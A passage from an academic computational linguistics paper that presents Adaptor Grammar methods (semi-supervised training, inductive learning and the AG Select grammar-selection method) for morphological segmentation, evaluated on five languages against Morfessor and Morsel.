Morsel (Lignos, 2010), and unsupervised AGs—we also show how to use the annotated data to train semi-supervised AGs (using the data to accumu- late rule statistics rather than for grammar selection). The grammar selection method yields comparable results to the best of these other approaches. To summarize, our contributions in this paper are: 1) scaling AGs to large data sets by using the poste- rior grammar to define an inductive model; 2) demon- strating how to train semi-supervised AG models, and showing that this improves morphological segmenta- tion over unsupervised training; and 3) introducing a novel grammar selection method for AG models whose segmentation results are competitive with the best existing systems. Before providing details of our methods and re- sults, we first briefly review Adaptor Grammars. For a formal definition, see Johnson et al. (2007). 2 Adaptor Grammars Adaptor Grammars are a framework for specifying nonparametric Bayesian models that can be used to learn latent tree structures from a corpus of strings. There are two components to an AG model: the base distribution, which is just a PCFG, and the adaptor, which “adapts” the probabilities assigned to individ- ual subtrees under the PCFG model, such that the probability of a subtree under the complete model may be considerably higher than the product of the probabilities of the PCFG rules required to construct it. Although in principle the adaptor can be any func- tion that maps one distribution onto another, Johnson et al. (2007) use a Pitman-Yor Process (PYP) (Pit- man and Yor, 1997) as the adaptor because it acts as a caching model. Under a PYP AG model, the posterior probability of a particular subtree will be roughly proportional to the number of times that sub- tree occurs in the current analysis of the data (with the probability of unseen subtrees being computed under the base PCFG distribution). An AG model can be defined by specifying the CFG rules (the support for the base distribution) and indicating which non-terminals are “adapted”, i.e., can serve as the root of a cached subtree. Given this definition and an input corpus of strings, Markov chain Monte Carlo samplers can be used to infer the posterior distribution over trees (and all hyperparam- eters of the model, including PCFG probabilities in the base distribution and PYP hyperparameters). Any frequently recurring substring (e.g., a common pre- fix) will tend to be parsed consistently, as this permits the model to treat the subtree spanning that string as a cached subtree, assigning it higher probability than under the PCFG distribution. Adaptor Grammars have been applied to a wide variety of tasks, including segmenting utterances into words (Johnson, 2008a; Johnson and Goldwa- ter, 2009; Johnson and Demuth, 2010), classifying documents according to perspective (Hardisty et al., 2010), machine transliteration of names (Huang et 256 al., 2011), native language identification (Wong et al., 2012), and named entity clustering (Elsner et al., 2009). There have also been AG experiments with morphological segmentation, but more as a proof of concept than an attempt to achieve state-of-the-art results (Johnson et al., 2007; Johnson, 2008b). 3 Using AGs for Learning Morphology Originally, the AG framework was designed for un- supervised learning. This section first describes how AGs can be used for unsupervised morphological segmentation, and then introduces two ways to use a small labelled data set to improve performance: semi-supervised learning and grammar selection. 3.1 Unsupervised Adaptor Grammars We define three AG models to use as unsupervised baselines in our segmentation experiments. The first of these is very simple: Word → Morph+ Morph → Char+ (1) The underline notation indicates an adapted non- terminal, and + abbreviates a set of recursive rules, e.g., Word → Morph+ is short for Word → Morphs Morphs → Morph Morphs Morphs → Morph Grammar 1 (MorphSeq) is just a unigram model over morphs: the Morph symbol is adapted, so the probability of each Morph will be roughly propor- tional to its (inferred) frequency in the corpus. The grammar specifies no further structural relationships between morphs or inside of morphs (other than a geometric distribution on their length in characters). Experiments with AGs for unsupervised word seg- mentation suggest that adding further latent structure can help with learning. Here, we add another layer of structure below the morphs,1 calling the resulting 1Because the nonterminal labels are arbitrary, this grammar can also be interpreted as adding another layer on top of morphs, allowing the model to learn morph collocations that encode de- pendencies between morphs (which themselves have no substruc- ture). However preliminary experiments showed that the morph- submorph interpretation scored better than the collocation-morph interpretation, hence we chose the corresponding nonterminal names. grammar SubMorphs: Word → Morph+ Morph → SubMorph+ SubMorph → Char+ (2) For capturing the rules of morphotactics, a gram- mar with linguistically motivated non-terminals can be created. There are many plausible options and the best-performing grammar may be somewhat language-dependent. Rather than experimenting ex- tensively, we designed our third grammar to replicate as closely as possible the grammar that is implicitly implemented in the Morfessor system. This Com- pounding grammar distinguishes between prefixes, stems and suffixes, allows compounding, defines the order in which the morphs can occur and also allows the morphs to have inner latent structure: Word → Compound+ Compound → Prefix∗ Stem Suffix∗ Prefix → SubMorph+ Stem → SubMorph+ Suffix → SubMorph+ SubMorph → Char+ (3) 3.2 Semi-Supervised Adaptor Grammars The first new use of AGs we introduce is the semi- supervised AG, where we use the labelled data to ex- tract counts of the different rules and subtrees used in the gold-standard analyses. We then run the MCMC sampler as usual over both the unlabelled and la- belled data, treating the counts from the labelled data as fixed. We assume that the labelled data provides a con- sistent bracketing (no two spans in the bracketing can partially overlap) and the labels of the spans must be compatible with the grammar. However, the bracketing may not specify all levels of structure in the grammar. In our case, we have morpheme bracketings but not, e.g., submorphs. Thus, using the SubMorphs grammar in semi-supervised mode will constrain the sampler so that Morph spans in the labelled data will remain fixed, while the SubMorphs inside those Morphs will be resampled. 257 The main change made to the AG inference pro- cess2 for implementing the semi-supervised AG was to prune out from the sampling distribution any non- terminals that are inconsistent with the spans/labels in the given labelling. 3.3 AG Select Both the unsupervised and semi-supervised methods described above assume the definition of a grammar that adequately captures the phenomena being mod- elled. Although the AG framework makes it easy to experiment with different grammars, these experi- ments can be time-consuming and require some good guesses as to what a plausible grammar might be. These problems can be overcome by automating the grammar development process to systematically eval- uate different grammars and find the best one. We propose a minimally supervised model selec- tion method AG Select that uses the AG framework to automatically identify the best grammar for different languages and data sets. We first define a very gen- eral binary-branching CFG grammar for AG training that we call the metagrammar. The metagrammar learns a parse tree for each word where each branch contains a different structure in the word. The granu- larity of these structures is determined by the depth of this tree. For example, Grammar 4 generates binary trees of depth two and can learn segmentations of up to four segments. Word → M1 Word → M1 M2 M1 → M11 M1 → M11 M12 M2 → M21 M2 → M21 M22 M11 → Chars+ M12 → Chars+ M21 → Chars+ M22 → Chars+ (4) Next we introduce the notion of a morphologi- cal template, which is an ordered sequence of non- terminals whose concatenated yields constitute the word and which are used to parse out a specific seg- mentation of the word. For example, using Gram- mar 4 the parse tree of the word saltiness is shown in Figure 1. There are four possible templates with four 2We started with Mark Johnson’s PYAG implementa- tion, http://web.science.mq.edu.au/∼mjohnson/code/py-cfg.tgz, which we also used for our unsupervised and grammar selection experiments. Word M1 M11 s a l M12 t M2 M21 i M22 n e s s Figure 1: The parse tree generated by the metagrammar of depth 2 for the word saltiness. different segmentations: M1 M2 (salt iness), M11 M12 M2 (sal t iness), M1 M21 M22 (salt i ness), and M11 M12 M21 M22 (sal t i ness). The morphological template consisting only of non-terminals from the lowest cached level of the parse tree is expected to have high recall, whereas the template containing the non-terminals just below the Word is expected to have high precision. Our goal is to find the optimal template by using a small labelled data set. The grammar selection process iter- ates over the set of all templates. For each template, the segmentations of the words in the labelled data set are parsed out and the value of the desired evalua- tion metric is computed. The template that obtained the highest score is then chosen. For each language we use a single template to seg- ment all the words in that language. However, even using (say) a four-morph template such as M11 M12 M21 M22, some words may contain fewer morphs because the metagrammar permits either unary or binary branching rules, so some parses may not con- tain M12 or M2 (and thus M21 M22) spans. Thus, we can represent segmentations of different lengths (from 1 to 2n, where n is the depth of the metagram- mar) with a single template.3 For our experiments we use a metagrammar of depth four. This grammar allows words to consist of up to 16 segments, which we felt would be enough for any word in the training data. Also, iterating over all the templates of a grammar with bigger depth would not be feasible as the number of different templates increases very rapidly.4 3We also experimented with selecting different templates for words of different length but observed no improvements over the single template approach. 4The number of templates of each depth can be expressed recursively as Ni = (Ni−1 + 1)2, where Ni−1 is the number of 258 3.4 Inductive Learning Previous work on AGs has used relatively small data sets and run the sampler on the entire input corpus (some or all of which is also used for evaluation)—a transductive learning scenario. However, our larger data sets contain millions of word types, where sam- pling over the whole set is not feasible. For example, 1000 training iterations on 50k word types took about a week on one 2.67 GHz CPU. To solve this problem, we need an inductive learner that can be trained on a small set of data and then used to segment a different larger set. To create such a learner, we run the sampler on up to 50k word types, and then extract the posterior grammar as a PCFG.5 This grammar contains all the initial CFG rules, plus rules to generate each of the cached subtrees inferred by the sampler. The sampler counts of all rules are normalized to obtain a PCFG, and we can then use a standard CKY parser to decode the remaining data using this PCFG. 4 Experiments 4.1 Data We test on languages with a range of morphologi- cal complexity: English, Finnish, Turkish, German, and Estonian. For each language we use two small sets of gold-annotated data—a labelled set for semi- supervised training or model selection and a dev set for development results—and one larger gold- annotated dataset for final tests. We also have a large unlabelled training set for each language. Table 1 gives statistics. The data sets for English, Finnish, Turkish and German are from the Morpho Challenge 2010 com- petition6 (MC2010). We use the MC2010 training set of 1000 annotated word types as our labelled data, and for our dev sets we collate together the devel- opment data from all years of the MC competition. Final evaluation is done on the official MC2010 test sets, which are not public, so we rely on the MC organizers to perform the evaluation. The words in templates in the grammar of depth one less and N0 = 0. 5This can be seen as a form of Structure Compilation (Liang et al., 2008), where the solution found by a more costly model is used to define a less costly model. However in Liang et al.’s case both models were already inductive. 6http://research.ics.aalto.fi/events/morphochallenge2010/ datasets.shtml Unlab. Lab. Dev Test English 0.9M 1000 1212 16K Finnish 2.9M 1000 1494 225K Turkish 0.6M 1000 1531 64K German 2.3M 1000 785 62K Estonian 2.1M 1000 1500 74K Table 1: Number of word types in our data sets. each test set are an unknown subset of the words in the unlabelled corpus, so to evaluate we segmented the entire unlabelled corpus and sent the results to the MC team, who then computed scores on the test words. The Estonian wordlist is gathered from the news- paper texts of a mixed corpus of Estonian.7 Gold standard segmentations of some of these words are available from the Estonian morphologically disam- biguated corpus;8 we used these for the test set, with small subsets selected randomly for the labelled and dev sets. For semi-supervised tests of the AG Compounding grammar we annotated the morphemes in the English, Finnish and Estonian labelled sets as prefixes, stems or suffixes. We could not do so for Turkish because none of the authors knows Turkish. 4.2 Evaluation We evaluate our results with two measures: segment border F1-score (SBF1) and EMMA (Spiegler and Monson, 2010). SBF1 is one of the simplest and most popular evaluation metrics for morphological segmentations. It computes F1-score from the preci- sion and recall of ambiguous segment boundaries— i.e., word edges are not counted. It is easy and quick to compute but has the drawback that it gives no credit for one-morpheme words that have been seg- mented correctly (i.e., are assigned no segment bor- ders). Also it can only be used on systems and gold standards where the output is just a segmentation of the surface string (e.g., availabil+ity) rather than a morpheme analysis (e.g., available+ity). For this reason we cannot report SBF1 on our German data, which annotations contain only analyses. EMMA is a newer measure that addresses both 7http://www.cl.ut.ee/korpused/segakorpus/epl 8http://www.cl.ut.ee/korpused/morfkorpus/ 259 of these issues—correctly segmented one-morpheme words are reflected in the score, and it can evalu- ate both concatenative and non-concatenative mor- phology. EMMA works by finding the best one-to- one mapping between the hypothesized and true seg- ments. The induced segments are then replaced with their mappings and based on that, F1-score on match- ing segments is calculated. Using EMMA we can evaluate the induced segmentations of German words against gold standard analyses. EMMA has a freely available implementation,9 but is slow to compute because it uses Integer Linear Programming. For our dev results, we computed both scores us- ing the entire dev set, but for the large test sets, the evaluation is done on batches of 1000 word types se- lected randomly from the test set. This procedure is repeated 10 times and the average is reported, just as in the MC2010 competition (Kohonen et al., 2010a). 4.3 Baseline Models We compare our AG models to several other mor- phology learning systems. We were able to obtain implementations of two of the best unsupervised sys- tems from MC2010, Morfessor (Creutz and Lagus, 2007) and Morsel (Lignos, 2010), and we use these for comparisons on both the dev and test sets. We also report test results from MC2010 for the only semi-supervised system in the competition, semi- supervised Morfessor (Kohonen et al., 2010a; Ko- honen et al., 2010b). No dev results are reported on this system since we were unable to obtain an imple- mentation. This section briefly reviews the systems. 4.3.1 Morfessor Categories-MAP Morfessor Categories-MAP (Morfessor) is a state- of-the-art unsupervised morphology learning system. Its implementation is freely available10 so it is widely used both as a preprocessing step in tasks requiring morphological segmentations, and as a baseline for evaluating morphology learning systems. Morfessor uses the Minimum Description Length (MDL) principle to choose the optimal segment lexi- con and the corpus segmentation. Each morph in the segment lexicon is labelled as a stem, prefix, suffix 9http://www.cs.bris.ac.uk/Research/MachineLearning/ Morphology/resources.jsp#eval 10http://www.cis.hut.fi/projects/morpho/ morfessorcatmapdownloadform.shtml or non-morph. The morphotactic rules are encoded as an HMM, which specifies the allowed morph se- quences with respect to the labels (e.g., a suffix can- not directly follow a prefix). The morphs in the segment lexicon can have a hierachical structure, containing submorphs which themselves can consist of submorphs etc. We hypoth- esize that this hierarchical structure is one of the key reasons why Morfessor has been so successful, as the experiments also in this paper with different gram- mars show that the ability to learn latent structures is crucial for learning good segmentations. One essential difference between Morfessor and the proposed AG Select is that while we use the la- belled data to choose which levels of the hierarchy are to be used as morphs, Morfessor makes this de- cision based on the labels of the segments, choosing the most fine-grained morph sequence that does not contain the non-morph label. Morfessor includes a free parameter, perplexity threshold, which we found can affect the SBF1 score considerably (7 points or more). The best value for this parameter depends on the size of the training set, characteristics of the language being learned, and also the evaluation metric being used, as in some cases the best SBF1 and EMMA scores are obtained with completely different values. Thus, we tuned the value of the perplexity thresh- old on the labelled set for each language and evalua- tion metric for different unlabelled training set sizes. 4.3.2 Semi-Supervised Morfessor Recently, the Morfessor system has been adapted to allow semi-supervised training. Four versions of the system were evaluated in MC2010, using differ- ent degrees of supervision. Results reported here are from the Morfessor S+W system, which performed best of those that use the same kind of labelled data as we do.11 This system uses the Morfessor Base- line model (not Cat-MAP), which incorporates a lexicon prior and data likelihood term. The semi- supervised version maintains separate likelihoods for the labelled and unlabelled data, and uses the devel- opment set to tune two parameters that weight these terms with respect to each other and the prior. 11Morfessor S+W+L performs better, but uses training data with morpheme analyses rather than surface segmentations. 260 4.3.3 Morsel Morsel (Lignos, 2010) is an unsupervised mor- phology learning system introduced in MC2010; we obtained the implementation from the author. Morsel learns morphological analyses rather than segmenta- tions, so it can be evaluated only using EMMA. There are two options provided for running Morsel: aggres- sive and conservative. We used the development set to choose the best in each experimental case. The MC data sets contain gold standard morpho- logical analyses (as well as segmentations) so we could compute Morsel’s EMMA scores using the analyses. However, we found that Morsel obtains higher EMMA scores when evaluated against gold standard segmentations and thus we used this option in all the experiments. (EMMA scores for other sys- tems were also computed using the segmentations.) 4.4 Method The experiments were conducted in two parts. First, we evaluated different aspects of the AG models and compared to all baseline models using the dev set data. Then we evaluated the most competitive models on the final test data. For the development experiments, we compiled un- labelled training sets with sizes ranging from 10k to 50k word types (using the most frequent word types in each case). For the AG results, we report the aver- age of five different runs made on the same training set. We let the sampler run for 1000 iterations. No annealing was used as it did not seem to help. The table label resampling option was turned on and the hyperparameter values were inferred. We trained all AG and baseline models on each of these training sets. For AG Select, the words from the labelled data set were added to the training set to allow for template selection.12 To compute results in transductive mode, the words from the dev set were also added to the training data. In inductive mode, the dev set was instead parsed with the CKY parser. Preliminary experiments showed that the perfor- mance of unsupervised AG and AG Select improved with larger training sets, though the effect is small (see Figure 2 for results of AG Select in transductive 12We also experimented with smaller sets of labelled data. In most cases, the template selected based on only 300 word types was the same than the one selected with 1000 word types. mode; the trend in inductive mode is similar). Based on these and similar results with other baseline sys- tems, all results reported later for unsupervised mod- els (AG and baseline) and AG Select were obtained using training sets of 50k words. In contrast to the above models, the semi- supervised AG does not always improve with more unlabelled data (see Figure 2) and in the limit, it will match the performance of the same grammar in the unsupervised setting. Other semi-supervised approaches often solve this problem by weighting the labelled data more heavily than the unlabelled data when estimating model parameters—effectively, assuming that each labelled item has actually been observed more than once. However, duplicating the labelled data does not make sense in the AG frame- work, because duplicate items will in most cases just be cached at the root (Word) node, providing no addi- tional counts of Morphs (which are where the useful information is). It might be possible to come up with a different way to weight the labelled data more heav- ily when larger unlabelled sets are used, however for this paper we instead kept the labelled data the same and tuned the amount of unlabelled data. We used the dev set to choose the amount of unlabelled data (in the range from 10k to 50k types); results for semi-supervised AG are reported using the optimal amount of unlabelled data for each experiment. For test set experiments with semi-supervised AG, we evaluated each language using whichever gram- mar performed best on that language’s dev set. For test set experiments with AG Select, we chose the templates with a two-pass procedure. First, we trained 5 samplers on the 50k training set with la- belled set added, and used the labelled data to choose the best template for each inferred grammar. Then, we decoded the dev set using each of the 5 gram- mar/template pairs and based on these results, chose the best of these pairs to decode the test set. 4.5 Results We present the dev set results in Table 2(a) for trans- ductive and in Table 2(b) for inductive learning. In each table, unsupervised models are shown in the upper section and the semi-supervised models and AG Select below. Morsel appears only in Table 2(a) since it only works transductively. Semi-supervised grammars cannot be trained on German, since we 261 55 60 65 70 75 80 85 90 10000 20000 30000 40000 50000 F -s c o re # of word types English Estonian Finnish Turkish 55 60 65 70 75 80 85 90 10000 20000 30000 40000 50000 F -s c o re # of word types English Estonian Finnish Turkish Figure 2: Effect of training data size on dev set SBF1 for AG Select (left) and semi-supervised SubMorphs grammar (right) in transductive mode. only have gold standard analyses, not segmentations. The SubMorphs grammar performs the best of the unsupervised AG models, with the Compounding grammar being only slightly worse. We also tried the Compounding grammar without the sub-morph structures but the results were even worse than those of MorphSeq. This shows that the latent structures are important for learning good segmentations. In all cases, the semi-supervised AGs perform bet- ter (ofen much better) than the corresponding unsu- pervised grammars. Even though their average scores are not as high as AG Select’s, they give the best dev set results in many cases. This shows that although for semi-supervised AG the grammar must be cho- sen manually, with a suitable choice of the grammar and only a small set of labelled data it can improve considerably over unsupervised AG. In transductive mode, the AG Select performs the best in several cases. In both transductive and induc- tive mode, the results of AG Select are close to the best results obtained and are consistently good across all languages—it achieves the best average scores of all models, suggesting that the model selection method is robust to different types of morphology and annotation schemes. Table 3 presents the test set results. We include scores for unsupervised Morfessor in both transduc- tive and inductive mode, where transductive mode trains on the entire unlabelled corpus and inductive mode trains on the 50k subset. The semi-supervised Morfessor scores are taken from the MC results page13 after verifying that the evaluation method- 13http://research.ics.aalto.fi/events/morphochallenge/ ology and labelled data used is the same as ours.14 There is a good deal of variation between devel- opment and test results, indicating that the dev sets may not be a representative sample. The most no- table differences are in Turkish, where all models perform far worse on the test than dev set. However, AG Select performs slightly better on the test set for the other languages. Thus its average SBF1 score ac- tually improves on the test set and is not much worse than semi-supervised Morfessor. While its average performance drops somewhat on test set EMMA, it is still as good as any other model on that measure. Again, these results support the idea that AG Select is robust to variations in language and data set. We also note the surprisingly good performance of Morfessor in transductive mode on Estonian; this could possibly be due to the larger amount of training data used for the test set results, but it is not clear why this would improve performance so much on Estonian and not on the other languages. 5 Discussion To give a sense of what the AG Select model is learn- ing, we provide some examples of both correctly and incorrectly induced segmentations in Table 4. These examples suggest that for example in English, M1 is used to model the stem, M21 is for the suffix or the second stem in the compound word, and the rest of the elements in the template are for the remaining suffixes (if any). Table 5 presents examples of some of the most frequently used metagrammar rules and cached rules 14Sami Virpioja, personal communication. 262 (a) Transductive mode Border F1-score EMMA Eng Est Fin Tur Avg Eng Est Fin Tur Ger Avg AG MorphSeq 61.5 54.0 56.9 59.5 58.0 74.7 74.1 63.7 53.5 59.4 65.1 AG SubMorphs 66.2 66.9 60.5 59.5 63.3 79.1 83.4 66.8 53.4 57.4 68.0 AG Compounding 63.0 64.8 60.9 60.9 62.4 75.4 81.6 65.5 53.7 62.2 67.7 Morfessor 69.5 55.7 65.0 69.3 64.9 81.3 75.3 67.8 62.2 62.7 69.9 Morsel - - - - - 76.8 74.4 66.1 50.1 55.9 64.7 AG ssv MorphSeq 64.4 57.3 63.0 68.9 63.4 74.4 75.9 65.6 59.6 - - AG ssv SubMorphs 67.6 69.1 64.4 63.4 66.1 79.5 84.4 69.2 56.1 - - AG ssv Compounding 70.0 67.5 71.8 - - 79.5 82.8 74.0 - - - AG Select 71.9 68.5 70.2 72.6 70.8 77.5 81.8 73.2 63.0 62.4 71.6 (b) Inductive mode Border F1-score EMMA Eng Est Fin Tur Avg Eng Est Fin Tur Ger Avg AG MorphSeq 57.6 54.0 55.4 59.8 56.7 72.0 73.8 62.6 53.7 58.9 64.2 AG SubMorphs 66.1 67.5 61.6 59.8 63.7 78.6 83.7 67.4 53.4 56.0 67.8 AG Compounding 62.0 64.8 57.4 61.1 61.3 73.5 81.1 61.9 53.2 61.0 66.2 Morfessor 68.9 51.1 63.5 68.2 62.9 80.9 72.0 68.1 60.6 60.8 68.5 AG ssv MorphSeq 64.6 56.9 63.1 70.3 63.8 72.7 73.3 65.9 61.2 - - AG ssv SubMorphs 70.1 69.7 66.3 67.9 68.4 80.4 83.7 70.5 59.0 - - AG ssv Compounding 70.5 67.2 70.0 - - 77.3 81.9 70.5 - - - AG Select 69.8 68.8 67.5 70.1 69.1 77.3 81.9 71.1 59.7 62.6 70.5 Table 2: Dev set results for all models in (a) transductive and (b) inductive mode. Unsupervised AG models and baselines are shown in the top part of each table; semi-supervised AG models and grammar selection method are below. Border F1-score EMMA Eng Est Fin Tur Avg -Est Eng Est Fin Tur Ger Avg -Est/Ger Morf. trans 67.3 73.9 61.2 57.1 64.9 61.9 78.4 78.8 61.8 49.8 65.2 66.8 63.3 Morf. ind 65.7 57.7 60.8 60.1 61.1 62.2 76.5 70.5 59.6 47.0 64.1 63.5 61.0 Morsel - - - - - - 81.9 77.2 63.3 47.8 59.0 65.8 64.3 Morf. ssv 77.8 - 71.7 68.9 - 72.8 80.6 - 62.1 49.9 - - 64.2 AG ssv best 70.3? 68.6† 64.9? 58.2∗ 65.5 64.5 75.9? 80.3† 61.3? 46.1∗ - - 61.1 AG Select 74.4 71.7 70.0 61.4 69.4 68.6 81.3 81.0 64.0 47.5 63.8 67.5 64.3 Table 3: Test set results for unsupervised baselines Morfessor CatMAP (in transductive and inductive mode) and Morsel; semi-supervised Morfessor; and AG semi-supervised (? marks the Compounding grammar, † denotes SubMorphs grammar, and ∗ is the MorphSeq grammar) and grammar selection methods. Results are shown for each language, averaged over all languages (when possible: Avg), and averaged over just the languages where scores are available for all systems (-Est, -Est/Ger). for English, together with their relative frequencies. It shows that at the Word level the binary rule is selected over three times more frequently than the unary rule. Also, most of the more frequently used grammar rules expand the first branch (rooted in M1) into more finegrained structures. The second branch (M2) is mostly modelled with the unary rule. Among the frequently cached rules we see the common English prefixes and suffixes. One of the most frequent cached rule stores the single letter e at the end of a word, which often causes oversegmen- tation of words ending in e (as seen in the incorrect examples in Table 4). This problem is common in unsupervised morphological segmentation of English (Goldwater et al., 2006; Goldsmith, 2001). We also took a look at the most frequent cached rules learned by the semi-supervised AG with the SubMorphs grammar, and observed that Morphs 263 Correct Segmentations Incorrect Segmentations Word Segmentation Induced Correct treatable [tr.ea.t]M1 [a.b.le]M21 disagree s dis agree s disciplined [dis.cip.l.i.n]M1 [e.d]M21 reduc e reduce monogamous [mon.o.g.a.m]M1 [o.u.s]M21 revalu e re value streakers [st.r.e.a.k]M1 [e.r]M21 [s]M2211 derid e deride tollgate [t.o.l.l.]M1 [g.a.t.e]M21 [s]M2211 accompani ed ac compani ed foxhunting [f.o.x]M1 [h.u.n.t]M21 [ing]M2211 war y wary muscovites [m.u.sc.o.v]M1 [i.t.e]M21 [s]M2211 indescrib able in describ able standardizes [st.a.n.d.a.rd]M1 [i.z.e]M21 [s]M2211 orat es orate s slavers’ [sl.a.v]M1 [e.r]M21 [s]M2211 [’]M2212 alger ian s algeri an s earthiness’ [e.ar.th]M1 [i]M2111 [ness]M2211 [’]M2212 disput e s dispute s instinkt [in.st.in.kt]M1 meister likkust meisterlikkus t rebis [re.b.i]M1 [s]M2 min a mina toitsid [to.it]M1 [s.id]M2 teiste teis te armuavaldus [a.rm.u]M11 [ava.ld.u.s]M12 kuritegu de sse kuri tegu desse määgivale [mää.g.i]M11 [v.a]M12 [l.e]M2 liharoa ga liha roa ga keskuskoulussa [kesk.us]M11 [koul.u]M12 [s.sa]M2 polte tti in polte tt i in peruslähteille [per.u.s]M11 [l.ä.ht.e]M12 [i]M211 [ll.e]M212 kulttuuri se lt a kin kulttuurise lta kin perunakaupoista [per.u.n.a]M11 [k.au.p.o]M12 [i]M211 [st.a]M212 tuote palki ntoja tuote palkinto j a yöpaikkaani [yö]M11 [p.ai.kk.a]M12 [a]M21 [n.i]M22 veli puo lt a veli puol ta nimettäköön [ni.m.e]M11 [tt.ä]M12 [k.ö]M21 [ö.n]M22 ota ttava otatta va Table 4: Examples of segmented words in English (top), Estonian (middle) and Finnish (bottom). Correctly segmented words are in the left part of the table. The identified segments are in brackets indexed by the respective template nonterminal; dots separate the metagrammar generated parse tree leaves. Examples of incorrectly segmented words together with the correct segmentation are on the right. Freq (%) Rule Freq (%) Cached Rule 9.9 Word → M1 M2 1.2 (M2 (M21 (M211 (M2111 s))))) 5.7 M1 → M11 M12 0.9 (M2 (M21 (M211 (M2111 e)) (M212 (M2121 d)))) 3.1 Word → M1 0.7 (M2 (M21 (M211 (M2111 i)) (M212 (M2121 n g)))) 2.5 M11 → M111 0.6 (M2 (M21 (M211 (M2111 e))) 1.8 M2 → M21 0.4 (M2 (M21 (M211 (M2111 ’))) (M22 (M221 (M2211 s)))) 1.4 M12→ M121 M122 0.3 (M1112 a) 1.4 M111 → M1111 M1112 0.3 (M2 (M21 (M211 (M2111 y)))) 0.9 M12 → M121 0.3 (M2 (M21 (M211 (M2111 e))) (M212 (M2121 r))) 0.9 M11 → M111 M112 0.2 (M2 (M21 (M211 (M2111 a)))) Table 5: Examples from English most frequently used metagrammar rules and cached rules together with their relative occurrence frequencies (in percentages). tended to contain only a single SubMorph. This helps to explain why the SubMorphs grammar in semi-supervised AG improved less over the unsuper- vised AG as compared to the MorphSeq grammar— the rules with only a single SubMorph under the Morph are essentially the same as they would be in the MorphSeq grammar. Finally, we examined the consistency of the tem- plates chosen for each of the 5 samplers during model selection for the test set (Section 4.4). We found that there was some variability in the templates, but in most experiments the same template was chosen for the majority of the samplers (see Table 6). While this majority template is not always the optimal one on the dev set, we observed that it does produce con- sistently good results. It is possible that using the majority template, rather than the optimal template for the dev set, would actually produce better results 264 Majority template English M1 M21 M2211 M2212 M222 Finnish M11 M12 M211 M212 M22 Turkish M11 M12 M211 M212 M22 German M11 M121 M122 M21 M221 M222 Estonian M11 M12 M2 Table 6: Majority templates for each language. Note that the Estonian gold standard contains less fine-grained segmentations than some of the other languages. on the test set, especially if (as appears to be the case here, and may often be the case in real applications) the dev and test sets are from somewhat different distributions. It must be noted that both AG Select and semi- supervised AG are computationally more demanding than the comparison systems. Since we do inference over tree structures, the complexity is cubic in the input word length, while most segmentation systems are quadratic or linear. Even compared to the unsu- pervised AG, AG Select is more expensive, because of the larger grammar and number of cached symbols. Nevertheless, our systems can feasibly be run on the large Morpho Challenge datasets. Other recent unsupervised systems have reported state-of-the art results by incorporating additional in- formation from surrounding words (Lee et al., 2011), multilingual alignments (Snyder and Barzilay, 2008), or overlapping context features in a log-linear model (Poon et al., 2009), but they have only been run on Semitic languages and English (and in the latter case, a very small corpus). Since they explicitly enumerate and sample from all possible segmentations of each word (often with some heuristic constraints), they could have trouble with the much longer words of the agglutinative languages tested here. In any case the results are not directly comparable to ours. 6 Conclusion In this paper we have introduced three new meth- ods for Adaptor Grammars and demonstrated their usefulness for minimally supervised morphological segmentation. First, we showed that AG models can be scaled to large data sets by using the posterior grammar for defining an inductive model, that on average results in the same accuracy as compared to full transductive training. Second, we implemented semi-supervised AG in- ference, which uses labelled data to constrain the sampler, and showed that in all cases it performs much better than the unsupervised AG on the same grammar. Semi-supervised AG could benefit from labelled data reweighting techniques frequently used in semi-supervised learning, and studying the proper ways of doing so within the AG framework would be a potential topic for future research. Our final contribution is the AG Select method, where the initial model is trained using a very general grammar that oversegments the data, and the labelled data is used to select which granularity of segments to use. Unlike other morphological segmentation mod- els, this method can adapt its grammar to languages with different structures, rather than having to use the same grammar for every language. Indeed, we found that AG Select performs well across a range of languages and also seems to be less sensitive to differences between data sets (here, dev vs. test). In addition, it can be trained on either morphological analyses or segmentations. Although we tuned all results to optimize the SBF1 metric, in principle the same method could be used to optimize other mea- sures, including extrinsic measures on downstream applications such as machine translation or informa- tion retrieval. In future we hope to show that this method can be used to improve performance on such applications, and also to explore its use for related segmentation tasks such as stemming or syllabifica- tion. Also, the method itself could potentially be improved by designing a classifier to determinine the best template for each word based on a set of features, rather than using a single template for all words in the language. Acknowledgments This work was supported by the Tiger University pro- gram of Estonian Information Technology Founda- tion for the first author. We thank Constantine Lignos for releasing his Morsel code to us, Sami Virpioja for evaluating test set results, and Federico Sangati for providing useful scripts. References Mathias Creutz and Krista Lagus. 2007. Unsupervised models for morpheme segmentation and morphology 265 learning. ACM Transactions of Speech and Language Processing, 4(1):1–34, February. Micha Elsner, Eugene Charniak, and Mark Johnson. 2009. Structured generative models for unsupervised named- entity clustering. In Proceedings of NAACL, pages 164–172. Association for Computational Linguistics. John Goldsmith. 2001. Unsupervised learning of the morphology of a natural language. Computational Lin- guistics, 27(2):153–198, June. Sharon Goldwater, Thomas L. Griffiths, and Mark John- son. 2006. Interpolating between types and tokens by estimating power-law generators. In Advances in Neu- ral Information Processing Systems 18, pages 459–466, Cambridge, MA. MIT Press. Eric A. Hardisty, Jordan Boyd-Graber, and Philip Resnik. 2010. Modeling perspective using adaptor grammars. In Proceedings of EMNLP, pages 284–292. Association for Computational Linguistics. Zellig Harris. 1951. Structural Linguistics. University of Chicago Press. Yun Huang, Min Zhang, and Chew Lim Tan. 2011. Non- parametric bayesian machine transliteration with syn- chronous adaptor grammars. In Proceedings of ACL: short papers - Volume 2, pages 534–539. Association for Computational Linguistics. Mark Johnson and Katherine Demuth. 2010. Unsuper- vised phonemic chinese word segmentation using adap- tor grammars. In Proceedings of COLING, pages 528– 536. Association for Computational Linguistics. Mark Johnson and Sharon Goldwater. 2009. Improving nonparameteric bayesian inference: experiments on un- supervised word segmentation with adaptor grammars. In Proceedings of NAACL, pages 317–325. Association for Computational Linguistics. Mark Johnson, Thomas L. Griffiths, and Sharon Gold- water. 2007. Adaptor grammars: A framework for specifying compositional nonparametric bayesian mod- els. In B. Schölkopf, J. Platt, and T. Hoffman, editors, Advances in Neural Information Processing Systems 19, pages 641–648. MIT Press, Cambridge, MA. Mark Johnson. 2008a. Unsupervised word segmentation for sesotho using adaptor grammars. In Proceedings of ACL Special Interest Group on Computational Mor- phology and Phonology, pages 20–27. Association for Computational Linguistics. Mark Johnson. 2008b. Using adaptor grammars to iden- tify synergies in the unsupervised acquisition of linguis- tic structure. In Proceedings of ACL, pages 398–406. Association for Computational Linguistics. Oskar Kohonen, Sami Virpioja, and Krista Lagus. 2010a. Semi-supervised learning of concatenative morphology. In Proceedings of ACL Special Interest Group on Com- putational Morphology and Phonology, pages 78–86. Association for 